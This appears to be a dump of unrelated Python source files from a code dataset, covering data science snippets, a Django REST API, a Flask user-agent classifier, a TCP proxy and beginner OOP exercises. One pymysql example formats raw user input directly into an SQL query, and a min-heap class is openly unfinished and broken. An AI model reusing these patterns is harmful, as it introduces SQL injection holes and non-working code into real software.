'.join(result)\n\n\ndef join(a, b):\n if a == b:\n return Dual(a, b)\n return Branch(a, b)\n\n\ndef sequence(previous, next):\n if isinstance(next, Group):\n next.add_subelement(previous)\n return next\n return Group().initialize(previous, next)\n\n\ndef add_flow(stack, result, previous, next):\n if previous.parent == next.parent:\n # Same function level\n result.append(sequence(previous, next))\n\n elif previous.id == next.parent:\n # Previously called next\n # if top of result is in the same level of call:\n # create sequece or combine results\n # if top of result is in a higher level, put Call on top of pile\n if result:\n add_flow(stack, result, Call(previous, next), result.pop())\n else:\n result.append(Call(previous, next))\n else:\n # Next is in a higher level\n # Put previous on top of result\n result.append(next)\n result.append(previous)\n","sub_path":"capture/noworkflow/now/models/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":18415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"429493253","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[46]:\n\n\nclass Dog():\n def __init__(self,name,age):\n self.name = name\n self.age = age \n\n\n# In[54]:\n\n\nclass Dog():\n pass\na = Dog()\n\n\n# In[55]:\n\n\nb = Dog()\na==b\n\n\n# In[89]:\n\n\n# 55>34<44\nclass Dog():\n \n def __init__(self,name,age):\n self.name = name \n self.age = age \n \nphilo = Dog(\"philo\",55)\nvicky = Dog(\"vicky\",33)\nlesi = Dog(\"lesi\",10)\nprint(\"{} is {} and {} is {} and {} is {}.\".format(philo.name,philo.age,vicky.name,vicky.age,lesi.name,lesi.age))\nif philo.age >= vicky.age:\n print(\"philo is older than vicky\")\nelif philo.age >= lesi.age:\n print(\"philo is older\")\nelse:\n print(\"lesi is older\")\n\n\n# In[100]:\n\n\nclass Dog():\n species = \"mammal\"\n def __init__(self,name,age):\n self.name = name \n self.age = age \n def speak(self, sound):\n print(\"{} speaks {}.\".format(self.name,sound))\nname1 = Dog(\"oaty\",55)\nname1.speak(\"booo booo\")\nclass Dog1(Dog):\n def cat(self,sound):\n print(\"{} speaks {}.\".format(self.name,sound))\n \nname2 = Dog1(\"caty\",\"45\")\nname2.speak(\"meomee\")\n\n\n# In[47]:\n\n\n#oops concept reverse a string \nclass concept():\n def __init__(self,string):\n self.string = string\n self.length = len(string)\n def reverse_string(self):\n if self.length <2:\n return False\n else:\n string1 = self.string[::-1]\n print(string1)\n def loop(self):\n for i in string1:\n print(i)\n \nconcept1 = concept(\"shiva\")\nconcept2 = concept(\"ram\")\nconcept1.reverse_string()\nconcept2.reverse_string()\n\n\n# In[2]:\n\n\n#attributes and instances declaration \nclass car():\n def __init__(self,color,model,year): #instance of class color,model and year are instance variables\n self.color = color #attributes of clas\n self.model = model #attributes of class\n self.year = year #attributes of class\n \n\n\n# In[35]:\n\n\n# Encapsulation\n\nclass Human():\n \n __privateVar = \"this is __private variable\"\n\n def __init__(self):\n self.className = \"Human class constructor\"\n self.__privateVar = \"this is redefined __private variable\"\n\n \n def showName(self, name):\n self.name = name\n return self.__privateVar + \" \" + name\n\n \n def __privateMethod(self):\n return \"Private method\"\n\n \n def _protectedMethod(self):\n return \"Protected method\"\n\n \n def showPrivate(self):\n return self.__privateMethod()\n\n def showProtecded(self):\n return self._protectedMethod()\n\n\nclass Male(Human):\n def showClassName(self):\n return \"Male\"\n\n def showPrivate(self):\n return self.__privateMethod()\n\n def showProtected(self):\n return self._protectedMethod()\n\n\nclass Female(Human):\n def showClassName(self):\n return \"Female\"\n\n def showPrivate(self):\n return self.__privateMethod()\n\n def showProtected(self):\n return self._protectedMethod()\n\n\nh = Human()\nprint(h.className)\nprint(h.showName(\"Vasya\"))\nprint(h.showPrivate())\nprint(h.showProtecded())\n# print(h.privateMethod())\n# print(h.protectedMethod())\nprint(\"\\n\")\n\nm = Male()\nprint(m.className)\nprint(m.showClassName())\n# print(m.showPrivate())\nprint(m.showProtected())\nprint(\"\\n\")\n\nf = Female()\nprint(f.className)\nprint(f.showClassName())\nprint(f.showProtected())\nprint(\"\\n\")\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"oops python practice-Copy1 (1).py","file_name":"oops python practice-Copy1 (1).py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"573426149","text":"from ShelterSmartHome.apps.gpsnode.models import GpsNodeGt06\n\n\n# ----------- Saving command to Data Base -----------\n\n\ndef command(inp, gps_name):\n terminal = GpsNodeGt06.objects.get(gps_name=gps_name)\n if inp == 'info':\n terminal.command = 'locate_info'\n terminal.save()\n elif inp == 'block':\n terminal.command = 'cut_oil_and_elect'\n terminal.save()\n elif inp == 'unblock':\n terminal.command = 'conn_oil_and_elect'\n terminal.save()\n","sub_path":"ShelterSmartHome/apps/gpsnode/gt06/server_command_to_db.py","file_name":"server_command_to_db.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"351819221","text":"class ApiRequestDataDepend(object):\n def apirequestdatadepend(self,activeapi,dependid):\n activeapi.outPutMyLog(\"依赖ID(dependid)为:%s\" % dependid)\n if dependid != None:\n activeapi.outPutMyLog(\"执行依赖\")\n from testapidatas.models import ApiRequestData\n apirequestdatatestcases = ApiRequestData.objects.filter(id=int(dependid))\n print(\"apirequestdatatestcases:%s\" % apirequestdatatestcases)\n if str(apirequestdatatestcases) != \"\":\n activeapi.outPutMyLog(\"找到依赖数据\")\n for apirequestdatatestcase in apirequestdatatestcases:\n depend = apirequestdatatestcase.depend_case_id\n activeapi.outPutMyLog(\"depend:%s\" % depend)\n if depend != None:\n activeapi.outPutMyLog(\"进入下一层依赖\")\n self.apirequestdatadepend(activeapi,depend)\n\n activeapi.outPutMyLog(\"执行的caseid:%s\" % apirequestdatatestcase.id)\n\n #进行接口请求\n url = apirequestdatatestcase.request_url\n\n from depend.requestsdepend.handleRequestsHeaders import handlerequestsheaders\n from depend.requestsdepend.handleRequestCookies import handlerequestscookies\n from depend.requestsdepend.handleRequestDatas import handlerequestsdatas\n\n headers = handlerequestsheaders.handlerequestsheaders(activeapi,apirequestdatatestcase.id)\n cookies = handlerequestscookies.handlerequestscookies(activeapi,apirequestdatatestcase.id)\n data = handlerequestsdatas.handlerequestsdatas(activeapi,apirequestdatatestcase.id)\n\n if apirequestdatatestcase.is_post: # 进行post请求\n if apirequestdatatestcase.is_json:\n activeapi.define_Post_Json(url=url, headers=headers, cookies=cookies, json=data)\n else:\n activeapi.define_Post_Data(url=url, headers=headers, cookies=cookies, data=data)\n\n else: # 进行get请求\n activeapi.define_Get(url=url, url_params=data, headers=headers, cookies=cookies)\n\n\n else:\n activeapi.outPutErrorMyLog(\"没有找到依赖id[%s]对应的数据!\" % dependid)\n else:\n activeapi.outPutMyLog(\"依赖ID为None,不执行依赖!\")\n\napirequestdatadepend = ApiRequestDataDepend()","sub_path":"depend/requestsdepend/apiRequestDataDepend.py","file_name":"apiRequestDataDepend.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"309135007","text":"#!/usr/bin/env python\r\n#coding=utf-8\r\n\r\n'''\r\n caculate TFIDF\r\n\r\n @author: zhangqiang\r\n @date: 2016/4/15\r\n'''\r\n\r\nfrom __future__ import division\r\nimport math\r\n\r\n\r\ndef TFIDF(cutWords,cutCorpuss):\r\n #计算TF值\r\n length = len(cutWords)\r\n myset = set(cutWords) #myset是另外一个列表,里面的内容是mylist里面的无重复项\r\n #print set(cutWords)\r\n tfs = []#所有元素的tf值列表\r\n for item in myset:\r\n tf = cutWords.count(item)/length#结果为实数,需要from __future__ import division\r\n tfs.append(tf)\r\n #print 'TF值:',tfs\r\n\r\n #计算IDF值,以语料库中的一行(问诊记录)为一个文档\r\n totalDocs = len(cutCorpuss)\r\n idfs = []\r\n\r\n for item in myset:\r\n count = 0\r\n for doc in cutCorpuss:\r\n if item in doc:\r\n count += 1\r\n idfs.append(math.log(totalDocs/(count+1)))\r\n #print 'IDF值:',idfs\r\n\r\n #计算TF-IDF值\r\n tfidfs = []\r\n for i in range(len(tfs)):\r\n tfidfs.append(tfs[i]*idfs[i])\r\n #print 'TF-IDF值',tfidfs\r\n\r\n return tfidfs,myset\r\n\r\n","sub_path":"demo/Word2Vec/ExtractKeywords/TFIDF.py","file_name":"TFIDF.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"495320592","text":"from slacker import Slacker\nfrom blackbelt.config import config\n\nclass Slack(object):\n def __init__(self, token=None):\n if not token:\n token = config['slack']['access_token']\n slack = Slacker(token)\n self.slack = slack\n if not token:\n raise ValueError(\"Can't do things with Slack without access token. Run bb init.\")\n\n self.token = token\n\n def post_message(self, message, room='#engine-room'):\n return self.slack.chat.post_message(room, message)\n\n\ndef post_message(message):\n client = Slack()\n client.post_message(message)\n","sub_path":"blackbelt/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558364685","text":"import pymysql\n\n# 1.链接数据库\n# 参数: 服务器地址,用户名,密码,数据库名,端口(默认3306),指定字符集。\nconn = pymysql.connections.Connection(host='localhost',\n user='root',\n password=' ',\n database='practice',\n port=3306,\n charset='utf8'\n )\n\n# 2.创建一个游标对象。\n# 如果不指定参数,默认返回元组:(('101', '李军', '男'), ('103', '陆君', '男'), ('105', '匡明', '男'), ('107', '王丽', '女'), ('108', '曾华', '男'))\ncursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n# 如果指定参数, 返回是列表:\n# [{'sno': '101', 'sname': '李军', 'ssex': '男'}, {'sno': '103', 'sname': '陆君', 'ssex': '男'}, {'sno': '105', 'sname': '匡明', 'ssex': '男'}, {'sno': '107', 'sname': '王丽', 'ssex': '女'}, {'sno': '108', 'sname': '曾华', 'ssex': '男'}]\n\n# 3.执行sql语句.\nsno = input('请输入学生的姓名:')\n\n# 字符串参数 两边需要添加单引号\nsql = \"select sno,sname,ssex from student where sname like '{}%'\".format(sno)\n# print(sql)\n\ntry:\n\trows = cursor.execute(sql) # 返回受影响的行数\n\n\tif rows > 0:\n\t\t# print(rows) 6\n\t\t# 4.读取结果集\n\t\t# data = cursor.fetchone() # 获取一条记录\n\t\t# data = cursor.fetchmany(5) # 获取n=5条记录\n\t\tdata = cursor.fetchall() # 获取所有记录\n\t\tprint(data)\n\t\t# print(cursor._executed) # 获取所执行的sql语句\nexcept Exception as e:\n\tprint(e)\n\n\nfinally:\n# 5.关闭链接\n\tcursor.close()\n\tconn.close()\n\n","sub_path":"day24.1.21/数据库/02_带参数的查询.py","file_name":"02_带参数的查询.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"309587933","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random as rd\ndotcolor=['.r','.g','.y','.b','.m','.k']\t\t#点的颜色\nlabelcolor=['*r','*g','*y','*b','*m','*k']\t\t#簇心的颜色\ndef readDtata():\n\tdata=[]\n\twith open('./cluster.dat','r') as f:\t#以可读方式打开dat数据文件\n\t\tfor line in f.readlines():\t\t#逐行读入数据\n\t\t\tline=list(line.strip().split())\n\t\t\tline[0]=eval(line[0])\n\t\t\tline[1]=eval(line[1])\n\t\t\tcurrent=[]\n\t\t\tfor i in line:\n\t\t\t\tcurrent.append(i)\t#存入current作为二维数组\n\t\t\tdata.append(current)\n\t\tTestData=rd.sample(data,200)\t#随机选择200个作为测试数据\n\t\tTrainData=[i for i in data if i not in TestData]\t#将剩下的800个作为训练数据\n\t\treturn np.mat(TestData),np.mat(TrainData)\ndef drawpicture(input,center,postion,number,k):\t\t#画出散点图\n\tfor i in range(number):\n\t\tif postion[i]==-1:\n\t\t\tpostion[i]=5\t#初始时将点画为黑色\n\t\tplt.plot(input[i,0],input[i,1],dotcolor[postion[i]])\t#画每个点\n\tfor i in range(k):\t\t#画簇心\n\t\tplt.plot(center[i,0],center[i,1],labelcolor[i])\n\tplt.show()\n\ndef BetweenDistance(m,n):\t#计算两个点的距离\n\tlength=len(m)\n\ttotal=0\n\tfor temp in range(2):\t#通过分别计算每个维度来计算两个点的欧式距离\n\t\tdistance=(m[0,temp]-n[0,temp])**2\n\t\ttotal+=distance\n\treturn np.sqrt(total)\n\n\n\n\ndef getInitialCenter(input,k):\t#初始化质心\n\tcenter=np.mat(np.zeros((k,2)))\t#得到质心的矩阵\n\tfor i in range(2):\n\t\tr=np.random.rand(k,1)*(max(input[:,i])-min(input[:,i]))\t#设置随机因子\n\t\tcenter[:,i]=(min(input[:,i])+r)\t#随机初始化\n\treturn center\n\ndef getNewCenter(input,postion,k,number):\t#更新簇心位置\n\tnewcenter=np.zeros((k,2))\n\tfor i in range(k):\t\t#对于所有的簇心\n\t\tn=0\n\t\ttemp = []\n\t\tfor j in range(number):\t#对于所有属于簇心i的那些点,加入到temp数组中\n\t\t\tif postion[j]==i:\n\t\t\t\tn+=1\n\t\t\t\ttemp.append(input[j,:])\n\t\tif n!=0:\n\t\t\tnewcenter[i,:]=np.mean(temp,axis=0)\t#如果簇心不为空,通过属于簇心的点来更新簇心\n\treturn np.mat(newcenter)\n\n\n\n\ndef KMeansClusterAnalysis(TestData,TrainData,k,flag=1):\n\tnumber=np.shape(TrainData)[0]\t#得到点的数量\n\tcenter=getInitialCenter(TrainData,k)\t#得到k个初始点\n\ttrain_postion=[-1]*number\t#所有点的归属的簇心\n\ttest_postion=[-1]*200\n\tepoch_loss=[]\n\tdrawpicture(TrainData, center, train_postion, 800, k)\t#画出初始点\n\twhile flag==1:\n\t\tmin_distance = [9999] * number\t#所有点到某个簇心的最小距离\n\t\tsum_loss=0\n\t\tfor i in range(200):\t#损失等于所有点的损失和\n\t\t\tsignal_loss=9999\n\t\t\tfor j in range(k):\t#计算每个点的损失\n\t\t\t\tdistance=BetweenDistance(TestData[i],center[j])\n\t\t\t\tif distance 0\n assert args.batch_size > 0\n assert args.in_channels > 0\n assert args.out_classes > 0\n\n model = vgg16_bn()\n model = torch.nn.DataParallel(model).cuda()\n model = model.cuda()\n\n print('Total params: %.2fM' % (sum(p.numel() for p in model.parameters()) / kMega))\n\n for test_idx in range(args.test_number):\n print(\"-------------------------------------------------------------------------------------------------------\")\n print(\"Testing {} out of {}\".format(test_idx, args.test_number))\n in_tensors = torch.rand([args.batch_size, args.in_channels, args.dim_y, args.dim_x])\n in_tensors = in_tensors.cuda()\n\n out_tensors = model(in_tensors)\n\n assert out_tensors.size()[0] == args.batch_size\n\n print(\"input shape = \", in_tensors.shape)\n print(\"output shape = \", out_tensors.shape)\n print(\"min value of output = \", out_tensors.min())\n print(\"max value of output = \", out_tensors.max())\n\n return\n\n\nif __name__ == '__main__':\n args = ParseArguments()\n\n TestVggnet2d(args)\n","sub_path":"net/vggnet_test.py","file_name":"vggnet_test.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"527392191","text":"from __future__ import unicode_literals\n\n\nclass ObjectDict(dict):\n\n \"\"\"\n An object that is usable as a dict or an object.\n\n .. code-block:: python\n\n o = ObjectDict()\n o.key = 'value'\n print(o['key'])\n 'value'\n \"\"\"\n\n def __init__(self, dictionary=None):\n dict.__init__(self)\n\n if dictionary is None:\n dictionary = dict()\n\n for key, value in dictionary.items():\n setattr(self, key, value)\n\n def __setattr__(self, name, value):\n if isinstance(value, dict):\n value = ObjectDict(value)\n dict.__setitem__(self, name, value)\n\n def __getattr__(self, name):\n \"\"\"Emulate the attribute with the dict key.\"\"\"\n if name in self:\n return dict.__getitem__(self, name)\n else:\n raise AttributeError(name)\n\n def __delattr__(self, name):\n \"\"\"Emulate the attribute with the dict key.\"\"\"\n if name in self:\n dict.__delitem__(self, name)\n else:\n raise AttributeError(name)\n\n __setitem__ = __setattr__\n","sub_path":"python-leryan.types/leryan/types/objectdict.py","file_name":"objectdict.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"375680387","text":"from todo import models\n\nfrom rest_framework import serializers\nfrom django.contrib.auth.models import User, Group\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('url', 'email')\n\nclass GroupSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Group\n fields = ('url', 'name')\n\n\nclass TodoItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.TodoItem\n fields = ('url', 'todo_list', 'text', 'completed', 'user', 'deleted')\n\nclass TodoListSerializer(serializers.ModelSerializer):\n todo_items = serializers.StringRelatedField(\n many=True,\n )\n\n class Meta:\n model = models.TodoList\n fields = ('id','url', 'name', 'user', 'created', 'todo_items')\n\nclass TodoListHyperlinkSerializer(serializers.ModelSerializer):\n\n todo_items = serializers.HyperlinkedRelatedField(\n many=True,\n view_name='todoitem-detail',\n read_only=True\n )\n\n class Meta:\n model = models.TodoList\n fields = ('id','url', 'name', 'user', 'created', 'todo_items')\n\nclass TodoListPKSerializer(serializers.ModelSerializer):\n\n todo_items = serializers.PrimaryKeyRelatedField(\n many=True,\n read_only=True\n )\n\n class Meta:\n model = models.TodoList\n fields = ('id','url', 'name', 'user', 'created', 'todo_items')\n\n\n\nclass TodoListTodoItemSerializer(serializers.ModelSerializer):\n\n todo_items = TodoItemSerializer(many=True, read_only=True)\n\n class Meta:\n model = models.TodoList\n fields = ('id','url', 'name', 'user', 'created', 'todo_items')\n","sub_path":"todo/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"62376542","text":"from protocols.base import BaseProto, ClosedConnectionError\n\n\nclass TCPProto(BaseProto):\n\n\n proto_name = \"tcp\"\n\n def __init__(self, stream_id, client, server, config, listener):\n\n BaseProto.__init__(self, stream_id, client, server, config, listener)\n\n def forward_outbound(self):\n\n while True:\n \n try:\n self.recv_outbound()\n self.send_outbound()\n\n except ClosedConnectionError as e:\n return\n\n def forward_inbound(self):\n\n while True:\n\n try:\n self.recv_inbound()\n self.send_inbound()\n\n except ClosedConnectionError as e:\n return\n","sub_path":"protocols/tcp.py","file_name":"tcp.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359926737","text":"from flask import Flask, request, jsonify\nimport numpy as np\nimport joblib\nimport pandas as pd\nfrom sklearn.svm import OneClassSVM\nfrom user_agents import parse\nimport re\n\nclf = joblib.load('clf.pkl')\ntrain_columns =joblib.load('train_columns.pkl')\ntrain_columns_order=joblib.load('train_columns_order.pkl')\n\ndef predict(ua_str,clf,train_columns,train_columns_order):\n benign=pd.DataFrame([ua_str])\n benign.columns=['user_agent']\n benign['timestamp']=benign['user_agent'].apply(lambda x: re.findall(r'^\\[(.+?)\\]',x)[0])\n benign['timestamp_obj']=benign['timestamp'].apply(lambda x:pd.to_datetime(x,format='%d/%b/%Y:%H:%M:%S -0700',errors='coerce'))\n benign['min']=benign['timestamp_obj'].apply(lambda x:(x.hour,x.minute))\n sample=benign\n sample['user_id']=benign['user_agent'].apply(lambda x: re.findall(r'user_\\d+|Nico Rosberg',x)[0])\n sample['browser_family']=sample['user_agent'].apply(lambda x:parse(x).browser.family)\n sample['browser_version']=sample['user_agent'].apply(lambda x:parse(x).browser.version_string)\n sample['os_family']=sample['user_agent'].apply(lambda x:parse(x).os.family)\n sample['os_version']=sample['user_agent'].apply(lambda x:parse(x).os.version_string)\n sample['device_family']=sample['user_agent'].apply(lambda x:parse(x).device.family)\n sample['device_brand']=sample['user_agent'].apply(lambda x:parse(x).device.brand)\n sample['device_model']=sample['user_agent'].apply(lambda x:parse(x).device.model)\n sample['is_mobile']=sample['user_agent'].apply(lambda x:parse(x).is_mobile)\n sample['is_tablet']=sample['user_agent'].apply(lambda x:parse(x).is_tablet)\n sample['is_pc']=sample['user_agent'].apply(lambda x:parse(x).is_pc)\n sample['is_touch_capable']=sample['user_agent'].apply(lambda x:parse(x).is_touch_capable)\n sample['is_bot']=sample['user_agent'].apply(lambda x:parse(x).is_bot)\n sample_cln=sample.drop(['user_agent','timestamp','timestamp_obj','min','os_version','browser_version','device_family','device_brand','device_model'],axis=1)\n sample_cln=pd.concat([sample_cln,pd.get_dummies(sample_cln['os_family'])],axis=1).drop(['os_family'],axis=1)\n sample_cln=pd.concat([sample_cln,pd.get_dummies(sample_cln['browser_family'])],axis=1).drop(['browser_family'],axis=1)\n\n \n # Get columns missing from test sample\n missing_cols = train_columns - set(sample_cln.columns)\n # Add missing column and set to zero\n for c in missing_cols:\n sample_cln[c] = 0\n # Reset column order\n sample_cln = sample_cln[train_columns_order]\n \n X=sample_cln.values\n \n\n try:\n result=clf.predict(X)\n if result==1:\n classification='benign'\n else:\n classification='non_benign'\n \n msg=sample['user_id'][0]+' is '+classification+' *** Browser:'+sample['browser_family'][0]+' Mobile:'+ ('yes' if sample['is_mobile'][0] else 'no')\n \n return msg\n except:\n return \n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n\treturn '

User Agent API Live!

'\n\n\n@app.route('/api/user_agent',methods =['POST','GET'])\ndef ua_pred():\n\t#content = request.json\n ua_str = request.args.get('ua')\n result = predict(ua_str,clf,train_columns,train_columns_order)\n return '''

{}

'''.format(result)#jsonify(result)\n\n\n\nif __name__=='__main__':\n\tapp.run()\n","sub_path":"user_agent_api2.py","file_name":"user_agent_api2.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"195868862","text":"## NOT RESOLVED\n\nclass MinHeap:\t\n\theap = []\n\tcapacity = 0\n\theapsize = 0\n\t\n\tdef __init__(self, cap):\n\t\tself.heap = []\n\t\tself.heapsize = 0\n\t\tself.capacity = cap\n\n\tdef parent(self, i):\n\t\treturn (i-1)/2\n\n\tdef left(self, i):\n\t\treturn (2*i + 1)\n\n\tdef right(self, i):\n\t\treturn (2*i + 2)\n\n\tdef getMin(self):\n\t\treturn heap[0]\n\n\tdef insertKey(self, key, heapsize, capacity):\n\t\tif heapsize == capacity:\n\t\t\tprint(\"Heap overflow, cant insert more\")\n\t\t\treturn\n\t\theapsize += 1\n\t\ti = heapsize-1\n\t\theap.append(key)\n\t\twhile i != 0 and heap[parent(i)] > heap[i]:\n\t\t\ttemp = heap[i]\n\t\t\theap[i] = heap[parent(i)]\n\t\t\theap[parent(i)] = temp\n\t\t\ti = parent(i)\n\n\tdef decreaseKey(self, i, new_val):\n\t\theap[i] = new_val\n\t\twhile i != 0 and heap[parent(i)] > heap[i]:\n\t\t\ttemp = heap[i]\n\t\t\theap[i] = heap[parent(i)]\n\t\t\theap[parent(i)] = temp\n\t\t\ti = parent(i)\n\n\tdef MinHeapify(self, i, heapsize):\n\t\tl = left(i)\n\t\tr = right(i)\n\t\tsmallest = i\n\t\tif l < heapsize and heap[l] < heap[smallest]:\n\t\t\tsmallest = l\n\t\tif r < heapsize and heap[r] < heap[smallest]:\n\t\t\tsmallest = r\n\t\tif smallest != i:\n\t\t\ttemp = heap[i]\n\t\t\theap[i] = heap[smallest]\n\t\t\theap[smallest] = temp\n\t\t\tMinHeapify(smallest)\n\n\tdef extractMin(self, heapsize):\n\t\tif heapsize <= 0:\n\t\t\treturn 1e9\n\t\tif heapsize == 1:\n\t\t\theapsize -= 1\n\t\t\treturn heap[0]\n\t\troot = heap[0]\n\t\theap[0] = heap[heapsize-1]\n\t\theapsize -= 1\n\t\tMinHeapify(0, heapsize)\n\t\treturn root\n\n\tdef deleteKey(self, i):\n\t\tdecreaseKey(i, -1e9)\n\t\textractMin()\n\nheapObj = MinHeap(10)\nheap = []\nheapsize = 0\ncapacity = 10\nheapObj.insertKey(3, heapsize, capacity)\nheapObj.insertKey(2, heapsize, capacity)\nheapObj.insertKey(15, heapsize, capacity)\nheapObj.insertKey(5, heapsize, capacity)\nheapObj.insertKey(4, heapsize, capacity)\nheapObj.insertKey(45, heapsize, capacity)\n\nprint(\"min is: \", heapObj.extractMin(heapsize))","sub_path":"binaryheap.py","file_name":"binaryheap.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"164728701","text":"import src.ifelse_tut as ifelse_tut\nimport src.lists_tut as lists_tut\nimport src.dictionary_tut as dictionary_tut\nimport src.forwhile_tut as forwhile_tut\n\n\ndef main():\n upercase_list = lists_tut.change_to_uppercase(['dejan', 'Branislav'])\n\n #######################################################################\n\n input_dict = {\n \"Dejan\" : \"55555\",\n \"Branislav\" : \"11111\"\n }\n\n filter_dict = dictionary_tut.filter_dictionary(input_dict, \"D\")\n\n #######################################################################\n\n ifelse_number = ifelse_tut.ifelse_numlist(['-99', '46', '5'])\n\n #######################################################################\n\n firwhile_myname = forwhile_tut.forwhile_names(['Dejan', 'Srdjan', 'Branislav'])\n\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449039776","text":"from celery import Celery\nfrom django.conf import settings\nfrom django.core.mail import send_mail\n\nbroker = settings.REDIS_URL.format(3)\n\napp = Celery('celery_task.task', broker=broker)\n\n\n@app.task\ndef send_register_active_mail(to_email, username, token):\n subject = '生鲜商城欢迎信息'\n message = ''\n sender = settings.EMAIL_FROM\n receiver = [to_email]\n html_message = f'

{username}, 欢迎您成为天天生鲜注册会员

请点击下面链接激活您的账户
' \\\n f'点击激活'\n send_mail(subject, message, sender, receiver, html_message=html_message)\n","sub_path":"celery_task/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"500667678","text":"# Python script to prepare gatk-genotype-gvcfs-v3.5-anyref files\n\n#Adjust file name for desired output name\nout = open(\"161219_gatk-genotype-gvcfs-v3.5-anyref_ILMN250_hg5.sh\", \"w\") \n\n#Set all of these values as appropriate \nref= \"GRCh38\"\nHG = \"HG005\"\t\t#genome\nplatform= \"Illumina\"\ncalls= \"Illumina_GRCh38_250x250\"\ncc = \"Ilmn250x250\" #chemistry and/or coverage\nmap = \"novoalign\" #mapper\nvc= \"sentieonHC\"\n\n\nchr = 1 \nfor i in range(22): \n\t\n\tout.write(\"dx run -y GIAB:/Workflow/GATK_V3.5/gatk-genotype-gvcfs-v3.5-anyref \" +\n\t \t\n\t\t\"-ivcfs=\" + HG + \"/\"+ ref + \"/\" + platform + \"/\" + calls + \"/Sentieon_output/\" + HG + \"_\" + str(chr) + \"_GRCh38_\"+ map + \"_\" + cc + \"_\" + vc + \"_gvcf.vcf.gz \" + \n\t\t\"-ivcfs=\" + HG + \"/\"+ ref + \"/\" + platform + \"/\" + calls + \"/Sentieon_output/\" + HG + \"_\" + str(chr) + \"_GRCh38_\"+ map + \"_\" + cc + \"_\" + vc + \"_gvcf.vcf.gz.tbi \" + \n\t\t\"-iprefix=\" + HG + \"_\" + str(chr) + \"_GRCh38_\"+ map + \"_\" + cc + \"_\" + vc + \" \" +\n\t\t\"-iref=/assets/GRCh38hs38d1noalt.fasta-index.tar.gz \" +\n\t\t\"--destination=/\" + HG + \"/\"+ ref + \"/\" + platform + \"/\" + calls + \"/Sentieon_output/\" +\t\n\t\t\"\\n\") \n\t\n\tchr = chr+1 \n\nout.close()\t\n\n","sub_path":"NISTv3.3.2/DNAnexusCommands/batch_processing_commands/Batch_Processing_shell_scritps_GRCh38/GRCh38/HG005/hg5_gatk-genotype-gvcfs-v3.5-anyref_ILMN_batch_script_GRCh38.py","file_name":"hg5_gatk-genotype-gvcfs-v3.5-anyref_ILMN_batch_script_GRCh38.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"102533361","text":"# -*- coding: utf-8 -*-\nfrom plone import api\nfrom Products.CMFPlone.interfaces import INonInstallable\nfrom zope.interface import implementer\n\n\n@implementer(INonInstallable)\nclass HiddenProfiles(object):\n def getNonInstallableProfiles(self):\n \"\"\"Hide uninstall profile from site-creation and quickinstaller\"\"\"\n return [\n \"{{cookiecutter.package_name}}:uninstall\",\n ]\n\n\ndef post_install(context):\n \"\"\"Post install script\"\"\"\n\n\ndef uninstall(context):\n \"\"\"Uninstall script\"\"\"\n # Do something at the end of the uninstallation of this package.\n\n\ndef add_catalog_indexes(context, wanted=None):\n \"\"\"Method to add our wanted indexes to the portal_catalog.\"\"\"\n catalog = api.portal.get_tool(\"portal_catalog\")\n indexes = catalog.indexes()\n indexables = []\n for name, meta_type in wanted:\n if name not in indexes:\n catalog.addIndex(name, meta_type)\n indexables.append(name)\n if len(indexables) > 0:\n catalog.manage_reindexIndex(ids=indexables)\n","sub_path":"{{cookiecutter.package_name}}/src/{{cookiecutter.namespace}}/{{cookiecutter.name}}/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"430749988","text":"#coding:utf-8\r\n\r\n#\r\n#creat lexicon, such as lake names ,city names. \r\n#\r\nimport codecs\r\n\r\n\r\n\r\n# lexe2f = 